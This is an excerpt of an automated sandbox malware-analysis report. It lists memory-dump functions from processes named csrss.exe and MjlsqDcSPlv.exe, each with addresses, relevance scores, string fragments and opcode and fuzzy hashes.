Opcode Fuzzy Hash: 77d21679f816680ea77e0b5279abc3bdb01399de9085e8f30e2507f85e3848db
Instruction Fuzzy Hash: 83C08C2080E743CFF25B8B1CC03533637B6AF03300F20C0BAD40E4A4E2CD28BA499291

Function 00007FFAAC5D2A70 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffce36f2ae7a39bfb72ffcfd2d252a8cf6303dae0d626612b48019422640223d
Instruction ID: 04c0cf01abc73f54993eff2c92a344d9b5d92dc8742829237da7a40ed1695d9f
Opcode Fuzzy Hash: ffce36f2ae7a39bfb72ffcfd2d252a8cf6303dae0d626612b48019422640223d
Instruction Fuzzy Hash: C8B09200B4A703E6B97141B81C88138024A8B8B2B0B218736F63B861E2EA986C0911A1

Function 00007FFAAC4CED91 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1630536387.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1daa667352cc766098f1c156f50abcc2679a76ee8d1e042f2fd5c8eebf710fc7
Instruction ID: 050c28f5570bf3f1c17bfa6910ee94d2cab8b1c38da87939348b585beb48941c
Opcode Fuzzy Hash: 1daa667352cc766098f1c156f50abcc2679a76ee8d1e042f2fd5c8eebf710fc7
Instruction Fuzzy Hash: 1BB09200E0E203D7F22202A0044C0BC01410B4724DAA08D30AA2E461E2DD48A84822E8

Non-executed Functions

Function 00007FFAAC46C149 Relevance: 7.8, Strings: 6, Instructions: 270COMMON

Download Yara Rule

Strings

p[, xrefs: 00007FFAAC46C1E3
T_H, xrefs: 00007FFAAC46C192
p[, xrefs: 00007FFAAC46C171
p[, xrefs: 00007FFAAC46C1AA
p[, xrefs: 00007FFAAC46C255
p[, xrefs: 00007FFAAC46C21C

Memory Dump Source

Source File: 00000020.00000002.1630536387.00007FFAAC46C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC46C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac46c000_csrss.jbxd

Similarity

API ID:
String ID: p[$p[$p[$p[$p[$T_H
API String ID: 0-1301415388
Opcode ID: 3bfcf52bf1cc8a088fd556d834f6ad558f6bec7f4997a2efad1784e65a311e0c
Instruction ID: c25fae85ef2076fe59a906d9ee989e747d85a222310035341acbb97c032e15de
Opcode Fuzzy Hash: 3bfcf52bf1cc8a088fd556d834f6ad558f6bec7f4997a2efad1784e65a311e0c
Instruction Fuzzy Hash: 44819BA1A0DA468FF399D72CD45A6B57BD1EF95314B0481BAE40FC328BDD1CAC0A47C9

Analysis Process: MjlsqDcSPlv.exePID: 400, Parent PID: 4056COMMON

Executed Functions

Function 00007FFAAC461222 Relevance: .4, Instructions: 393COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.1661707236.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffaac460000_MjlsqDcSPlv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6769b010e30348ab94f01ac691b457422474830a83f32d0cf8da5b2c85e633e
Instruction ID: 47f2d63e35222df27631bcb9845cb7379b6ff3cc29b34432149cb831d31dbf69
Opcode Fuzzy Hash: c6769b010e30348ab94f01ac691b457422474830a83f32d0cf8da5b2c85e633e
Instruction Fuzzy Hash: A1C1482091E68A8FF75A9738C4596B5BBD1EF87324F0480BAD48FC719BDD18E8468381

Function 00007FFAAC460EB5 Relevance: 7.8, Strings: 6, Instructions: 286COMMON

Download Yara Rule

Strings

r6, xrefs: 00007FFAAC461058
r6, xrefs: 00007FFAAC4610F5
r6, xrefs: 00007FFAAC4610CE
r6, xrefs: 00007FFAAC46102D
r6, xrefs: 00007FFAAC460FF0
H, xrefs: 00007FFAAC460F06

Memory Dump Source

Source File: 00000026.00000002.1661707236.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffaac460000_MjlsqDcSPlv.jbxd

Similarity

API ID:
String ID: H$r6$r6$r6$r6$r6
API String ID: 0-68624098
Opcode ID: 9eeacd20b488e719c50ead14485d349dd42af853939ca9ea1ac7be1e8f169793
Instruction ID: 6b6c2bb9290aa10df1aed8089570633b5bfe21ddcb65bcf85d2e08338d69468a
Opcode Fuzzy Hash: 9eeacd20b488e719c50ead14485d349dd42af853939ca9ea1ac7be1e8f169793
Instruction Fuzzy Hash: 5E81B571A18A4D8FEB98EB6CD4557FCBBE2EF99310F044179D04ED3296CE24AC468781

Function 00007FFAAC460B85 Relevance: 1.4, Strings: 1, Instructions: 134COMMON

Download Yara Rule

Strings

X, xrefs: 00007FFAAC460BBF

Memory Dump Source

Source File: 00000026.00000002.1661707236.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffaac460000_MjlsqDcSPlv.jbxd

Similarity

API ID:
String ID: X
API String ID: 0-3240521626
Opcode ID: 1075fb478ae14edb4b3a447d26b719d042dc7dda3388587b4ebfe302870a485f
Instruction ID: f72f82671f77eec38e12a04c0c9b951489ad844417492965aba6675e6f7dcb73
Opcode Fuzzy Hash: 1075fb478ae14edb4b3a447d26b719d042dc7dda3388587b4ebfe302870a485f
Instruction Fuzzy Hash: 96415E6175DA454FE784EB78C499EB57BD1EF95304B1081B5E00EC32D7CD18EC468781

Function 00007FFAAC460CDA Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

(L, xrefs: 00007FFAAC460D21

Memory Dump Source

Source File: 00000026.00000002.1661707236.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffaac460000_MjlsqDcSPlv.jbxd

Similarity

API ID:
String ID: (L
API String ID: 0-2945913762
Opcode ID: 6f6dc103009850b31eb9f26c27645e279af59229af00f835c08c226c6058dbdd
Instruction ID: 0beaf51aa4466561fc19cc1fd3e9ca3b7c4f32775876dbe8f12b1efca825de73
Opcode Fuzzy Hash: 6f6dc103009850b31eb9f26c27645e279af59229af00f835c08c226c6058dbdd
Instruction Fuzzy Hash: A331DA62A1DB444FF7589728D40A6A9BBD1EF99314F04017EF08EC31C7DD289C068396

Function 00007FFAAC46276D Relevance: .7, Instructions: 680COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.1661707236.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffaac460000_MjlsqDcSPlv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09dd23f5d25a3f741ad674a8e308b28976fdd9ca8646283cad84e234228401ca
Instruction ID: 70cc541f2575f26527486d62a932bd7f7dcef46fb5153c13642cbb0542767a08
Opcode Fuzzy Hash: 09dd23f5d25a3f741ad674a8e308b28976fdd9ca8646283cad84e234228401ca
Instruction Fuzzy Hash: 2C32136190D6869FF375AB24C8096B9FBD0EF82318F0480B9D44EC759BDE1CAC4A87D5

Function 00007FFAAC4648F1 Relevance: .5, Instructions: 497COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.1661707236.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffaac460000_MjlsqDcSPlv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1397680907b8dc72552a92a28ef4dd0327eb860ad457b0bdb6f72d27404c052
Instruction ID: bc4aacbe3673dc30cb17904b187f75e389c0ad3c171a593c493d185a5afd101b
Opcode Fuzzy Hash: f1397680907b8dc72552a92a28ef4dd0327eb860ad457b0bdb6f72d27404c052
Instruction Fuzzy Hash: 89F12B61D1E94ADFFBA4D718C4AA679B7E1EF56308B549079C00DC31DAED28EC4983C8

Function 00007FFAAC4634AF Relevance: .5, Instructions: 490COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.1661707236.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffaac460000_MjlsqDcSPlv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e54d5d89f4177f541301aa9511d61a95eb58f2560428c04309ab71d3fa5e0cb
Instruction ID: 9b6ee3af8ab14133931646f4d944e856a53aa65e41c21bedf20635af4fea6625
Opcode Fuzzy Hash: 3e54d5d89f4177f541301aa9511d61a95eb58f2560428c04309ab71d3fa5e0cb
Instruction Fuzzy Hash: B2E11B66A485598FE750FB7CE859AECBBA0FFC4325F004477D14DC7257CE2468898B90

Function 00007FFAAC4634D3 Relevance: .5, Instructions: 468COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.1661707236.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffaac460000_MjlsqDcSPlv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c288397a425bc6d6318d445371bc6719cdcab9df3ffa0db0f9191027fb076e5e
Instruction ID: a5b8a5462711c2d7b8e258a6c8ebfca494a9bc82f64aac2e3b6947bd73f525f1
Opcode Fuzzy Hash: c288397a425bc6d6318d445371bc6719cdcab9df3ffa0db0f9191027fb076e5e
Instruction Fuzzy Hash: 55D12A76A085598FE750FB7CE859AECB7A0FFC5326F004477D14DC6297CD2468898B90

Function 00007FFAAC4635D3 Relevance: .4, Instructions: 357COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.1661707236.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffaac460000_MjlsqDcSPlv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 213068a3975bab8258d47a38b8bd799c0c34ba104e93f6d546ca173ad7e90778
Instruction ID: c61d04dc6e23d078c1b725bdceb710b210d1bebc8434a6e1bc4b903861bffee3
Opcode Fuzzy Hash: 213068a3975bab8258d47a38b8bd799c0c34ba104e93f6d546ca173ad7e90778
Instruction Fuzzy Hash: 13B1F976E089598FE750FB7CE859BEDBBA0FF85315F00447AD10DD7286CE2458498B90

Function 00007FFAAC462640 Relevance: .3, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.1661707236.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffaac460000_MjlsqDcSPlv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df07cc710184f580f0634e4220d2725b0694649c648c5141613063c7f3cb8428
Instruction ID: cd87dffef5d9961105c97e3d1c917e15f9040a036c98cd6b603efc8b96148b47
Opcode Fuzzy Hash: df07cc710184f580f0634e4220d2725b0694649c648c5141613063c7f3cb8428
Instruction Fuzzy Hash: CBB1D571A1D64A9FF764EB28C819676B791EF86318F1480B9D00EC72D7CE29EC45C784

Function 00007FFAAC4639E9 Relevance: .2, Instructions: 233COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.1661707236.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffaac460000_MjlsqDcSPlv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3eec3ac5f6d9072c674da1382029e474ddef85896517ab61a208b1076fafd04
Instruction ID: d5f7a7c4f5eb984b7fe1338ea031a9236071c86e67123b4773fff45c05323c95
Opcode Fuzzy Hash: e3eec3ac5f6d9072c674da1382029e474ddef85896517ab61a208b1076fafd04
Instruction Fuzzy Hash: 1B810BB1D08A5D8FEB54EB68C495AADBBF1FF59304F5004B9D00EE7291DB38A985CB40

Function 00007FFAAC4650A9 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.1661707236.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffaac460000_MjlsqDcSPlv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88c79a861d2189c93fcc1319e3a30b4164a7679deed3189e8ae223409d5a3ba3
Instruction ID: e855099e802615e03ba6355988689b67588e5711f7a938545c368709a6842c03
Opcode Fuzzy Hash: 88c79a861d2189c93fcc1319e3a30b4164a7679deed3189e8ae223409d5a3ba3
Instruction Fuzzy Hash: 2D310561E0E6894FEB45E76888295FDBBF1EF99300F1841BBD04ED7297CD189C048792

Function 00007FFAAC460A76 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.1661707236.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffaac460000_MjlsqDcSPlv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55575f97cb2026fa53e92293c0134f72300068413938b82f58c8f6ace855d6c9
Instruction ID: a958fd06d1c13b44fbbd98b995df5d97a6e59186e68234f98399c276c68cff6c
Opcode Fuzzy Hash: 55575f97cb2026fa53e92293c0134f72300068413938b82f58c8f6ace855d6c9
Instruction Fuzzy Hash: E6317A319096198FEB51EB74C459AE9BFF0FF19304F14847AD40AE3196DA38E884CB98

Function 00007FFAAC462488 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.1661707236.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffaac460000_MjlsqDcSPlv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88dcece4d385dbbacf3bde791a56387954e332e2995bcace70f42842462f564c
Instruction ID: ae31554002b6c8333b32481f7eb016d83f559605e2d09b533bafcdbe98f33ee8
Opcode Fuzzy Hash: 88dcece4d385dbbacf3bde791a56387954e332e2995bcace70f42842462f564c
Instruction Fuzzy Hash: E321F571F1891D8BEB94EB6CD81A6FDB3E1EB98310F14417AE40ED3285CD28A84547D1

Function 00007FFAAC4609C1 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.1661707236.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffaac460000_MjlsqDcSPlv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c96c84b0295fc2a34f13c3797b87a76bc3a636c041ecadcdc32fef0633f014cc
Instruction ID: d9d36926c98ba91e2fe8b23aca68e2fb44e0954b0172c22509ca565c859cd169
Opcode Fuzzy Hash: c96c84b0295fc2a34f13c3797b87a76bc3a636c041ecadcdc32fef0633f014cc
Instruction Fuzzy Hash: BD11C611A4EA4B4FF3956768586D6B5AEC1DFA6254B04817BD80EC219ADD48EC0943CC

Function 00007FFAAC464EB1 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.1661707236.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffaac460000_MjlsqDcSPlv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08dbea0f55c8eca87906fbe01282dc2a6c3af05e3e5a127627f379e620ff8634
Instruction ID: 31e617c8f8c7bcc0cfb649de4df83d93c9b642295e09f0a2152e2bae986589fb
Opcode Fuzzy Hash: 08dbea0f55c8eca87906fbe01282dc2a6c3af05e3e5a127627f379e620ff8634
Instruction Fuzzy Hash: 0011866184F7C54FE7039374AC655E1BFB4AF43215B0D81E7D489CB0A3D50D595AC3A2

Function 00007FFAAC46089D Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.1661707236.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffaac460000_MjlsqDcSPlv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b449ef4110ca9f7aaf6dfcdc56be2f6c38ab3c6ef077e173e96dac1d8713679
Instruction ID: 09063af11b47d6f66cdde5bddfebf55913fd106343225d5f3a7520e14fa6e533
Opcode Fuzzy Hash: 2b449ef4110ca9f7aaf6dfcdc56be2f6c38ab3c6ef077e173e96dac1d8713679
Instruction Fuzzy Hash: 56113A7150DB898FE785E72880681B9BFE0EF96324F04457FE04EC3296DE28D84A87C5

Function 00007FFAAC4609E0 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.1661707236.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffaac460000_MjlsqDcSPlv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f726f8c9ed7861856fc4e9a7188b9b41bfadaea5a6e49ea933c6426dbfa6684d
Instruction ID: 220419e83008f0faf87acedc949acde6da63cc4e905c262372f3c6dd4c915296
Opcode Fuzzy Hash: f726f8c9ed7861856fc4e9a7188b9b41bfadaea5a6e49ea933c6426dbfa6684d
Instruction Fuzzy Hash: 2F01D812B0ED0F4BB2D46A5C685D6B66EC5DFE6694B508237980EC218EDC48EC4A42CC

Function 00007FFAAC460E39 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.1661707236.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffaac460000_MjlsqDcSPlv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97a2ba8ac69f1df51166c0556fa439d7b0ab1aa08364534179822e4e9f52a2d0
Instruction ID: d237879fb62c2403691a301d6fd3e2b4316397faea6b06bfa89a68af1bac3afd
Opcode Fuzzy Hash: 97a2ba8ac69f1df51166c0556fa439d7b0ab1aa08364534179822e4e9f52a2d0
Instruction Fuzzy Hash: CB11C821A0E7C54FE347A33CE4996B4BFD1AF87215B0941F6E04CCA1A7DA58484AC346

Function 00007FFAAC464F11 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.1661707236.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffaac460000_MjlsqDcSPlv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48f05e0a2fbffd24f8caf3dbec9eac8cb64eec7e075252d65dbfd2bfe1460bea
Instruction ID: 53b9c85ebf0c67be2c1f4373699b7286d05d31d269b146e1a91462fbd4a44603
Opcode Fuzzy Hash: 48f05e0a2fbffd24f8caf3dbec9eac8cb64eec7e075252d65dbfd2bfe1460bea
Instruction Fuzzy Hash: E1019960A0E2824BFB1F933884243F8AB519F83368F0481F9C04ECA1DBDC1D989A83D5

Function 00007FFAAC464064 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.1661707236.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffaac460000_MjlsqDcSPlv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40e5d557196cc0da3331e668f58bcc4c6cd66acdce63d5a61746166e33fa2270
Instruction ID: 819712b84dbfb5f71198ee6505eeb1217ae389f17c0f88c9082bc06c9f7ef61e
Opcode Fuzzy Hash: 40e5d557196cc0da3331e668f58bcc4c6cd66acdce63d5a61746166e33fa2270
Instruction Fuzzy Hash: 3AF02D92F0D91A4FFF98D76C545E1FCA7E1DB59214B60603AD14EC3186EC049C0A03C1

Function 00007FFAAC46518D Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.1661707236.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffaac460000_MjlsqDcSPlv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89c5a9277d5194ebb6e08bb9e14837679ff8a06cb61e685558dfb25b4e800678
Instruction ID: 8360a87ce6d98cce641ad7509d458ffbb93c568f68ce26c1772a3d7f011a1829
Opcode Fuzzy Hash: 89c5a9277d5194ebb6e08bb9e14837679ff8a06cb61e685558dfb25b4e800678
Instruction Fuzzy Hash: 2BF08C71F0950E8BEF94EA9C98491FEB3A1EB98314B144475D40EE3289CD28A90687D0

Function 00007FFAAC460DF6 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.1661707236.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffaac460000_MjlsqDcSPlv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbc62f98c61db7b9cc888fcf46f50ce43375d176f6f3a66cf450fd5e86c292a1
Instruction ID: 2851392e1137cfdb1728625987c6d770bbece55960d4fee8de3c33a62ea6325e
Opcode Fuzzy Hash: dbc62f98c61db7b9cc888fcf46f50ce43375d176f6f3a66cf450fd5e86c292a1
Instruction Fuzzy Hash: D9E02B7290DA4C6FBB08AA59FC07CF67F98DA87234B00015FF19EC2553E112A4638699

Function 00007FFAAC463C81 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.1661707236.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffaac460000_MjlsqDcSPlv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebc0863801cdb0b979ee1f4bcfef6f7d864774cf891317ab6841e1c72f7ac818
Instruction ID: 5e73f64a4814703d5e0942579191a6d389c5b127fab5824d75204a746117fc75
Opcode Fuzzy Hash: ebc0863801cdb0b979ee1f4bcfef6f7d864774cf891317ab6841e1c72f7ac818
Instruction Fuzzy Hash: 54E06F328ADA8C8BEB10AB1CBC042C8B6A0FB8930CF0002A9E00CC3080C3218668C749

Function 00007FFAAC464D65 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.1661707236.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffaac460000_MjlsqDcSPlv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 865ad34fc0576191e23776b4fb08cb7bb5c4f1de8546fd324711fff902e41e36
Instruction ID: 7f79320e9619f1947bf4e1e07cb252f64b67d2771b731da05af7c8be2db6023f
Opcode Fuzzy Hash: 865ad34fc0576191e23776b4fb08cb7bb5c4f1de8546fd324711fff902e41e36
Instruction Fuzzy Hash: 1DE0D83185DA0DCBDF44E7999C452E976A4FB49308F000169E04CC3185D7359955C789

Function 00007FFAAC460CC0 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.1661707236.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffaac460000_MjlsqDcSPlv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6d69149c3a7f28010f16e4006baaa54ef6ded99f0e25584386c82a4bca4f612
Instruction ID: e4f736d6d11eee08a8323d54cecbcb78701db8c8b66dc7991e089f2afe1a774f
Opcode Fuzzy Hash: a6d69149c3a7f28010f16e4006baaa54ef6ded99f0e25584386c82a4bca4f612
Instruction Fuzzy Hash: 8CC02B13BCE90E099E006068FC40CE1F380C7401303504A33C80BC1008DC1B94C10340

Non-executed Functions

Function 00007FFAAC4645AA Relevance: 5.2, Strings: 4, Instructions: 173COMMON

Download Yara Rule

Strings

H, xrefs: 00007FFAAC4645DC
(0, xrefs: 00007FFAAC464621
(0, xrefs: 00007FFAAC464638
r6, xrefs: 00007FFAAC4645AE

Memory Dump Source

Source File: 00000026.00000002.1661707236.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffaac460000_MjlsqDcSPlv.jbxd

Similarity

API ID:
String ID: (0$(0$H$r6
API String ID: 0-147897198
Opcode ID: 66c0dfd52c364994366cb212bafbd3e7d86771e614e9e41bedf03b9317543f0b
Instruction ID: 091f79349b6199a6854670efa80dd4ddadd2bb5fc23031bd3011a36f51a00f45
Opcode Fuzzy Hash: 66c0dfd52c364994366cb212bafbd3e7d86771e614e9e41bedf03b9317543f0b
Instruction Fuzzy Hash: 7141A551B19E4E4BEFC8DB6C9499AB563C1EBA8315710917AD80FC729BED28DC068384

Analysis Process: csrss.exePID: 2760, Parent PID: 4240COMMON

Executed Functions

Function 00007FFAAC460EB5 Relevance: 2.6, Strings: 2, Instructions: 137COMMON

Download Yara Rule

Strings

H, xrefs: 00007FFAAC460F06
r6, xrefs: 00007FFAAC460FF0

Memory Dump Source

Source File: 00000027.00000002.1715504828.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffaac460000_csrss.jbxd

Similarity

API ID:
String ID: H$r6
API String ID: 0-2760538688
Opcode ID: d423cde355483dba45ead49ec65118102bd692cde143d975b604fba80bb583f3
Instruction ID: 5aaa14a51c70a6c2f980f6485a92cf60f6cb14b629d04c645bc56f9fecdcd80f
Opcode Fuzzy Hash: d423cde355483dba45ead49ec65118102bd692cde143d975b604fba80bb583f3
Instruction Fuzzy Hash: 4441C671A08A089FEB98D76CC4657F9BBE2EF99311F0441B9D00ED3296CD249C46C790

Function 00007FFAAC460B85 Relevance: 1.4, Strings: 1, Instructions: 134COMMON

Download Yara Rule

Strings

X, xrefs: 00007FFAAC460BBF

Memory Dump Source

Source File: 00000027.00000002.1715504828.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffaac460000_csrss.jbxd

Similarity

API ID:
String ID: X
API String ID: 0-3240521626
Opcode ID: e006f0dda8b8e37c14a6b256a9dd7e573e00605987e0b6aaaa1e2759ae876f9e
Instruction ID: 733ba6d27fe2dcbf105cfc880023459de9b85326adc960ddef98b6b60111ffb2
Opcode Fuzzy Hash: e006f0dda8b8e37c14a6b256a9dd7e573e00605987e0b6aaaa1e2759ae876f9e
Instruction Fuzzy Hash: D1415C6075DA494FE784EB78C499EB57BE2EF99304B1081B5E00EC72A7CD28EC468781

Function 00007FFAAC460CDA Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

(L, xrefs: 00007FFAAC460D21

Memory Dump Source

Source File: 00000027.00000002.1715504828.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffaac460000_csrss.jbxd

Similarity

API ID:
String ID: (L
API String ID: 0-2945913762
Opcode ID: 34ff5d52b4a26fbede0b7213fc0749ac7eab13dc32df96d73fc859695a93b7c0
Instruction ID: 0beaf51aa4466561fc19cc1fd3e9ca3b7c4f32775876dbe8f12b1efca825de73
Opcode Fuzzy Hash: 34ff5d52b4a26fbede0b7213fc0749ac7eab13dc32df96d73fc859695a93b7c0
Instruction Fuzzy Hash: A331DA62A1DB444FF7589728D40A6A9BBD1EF99314F04017EF08EC31C7DD289C068396

Function 00007FFAAC46276D Relevance: .7, Instructions: 680COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.1715504828.00007FFAAC462000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC462000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffaac462000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
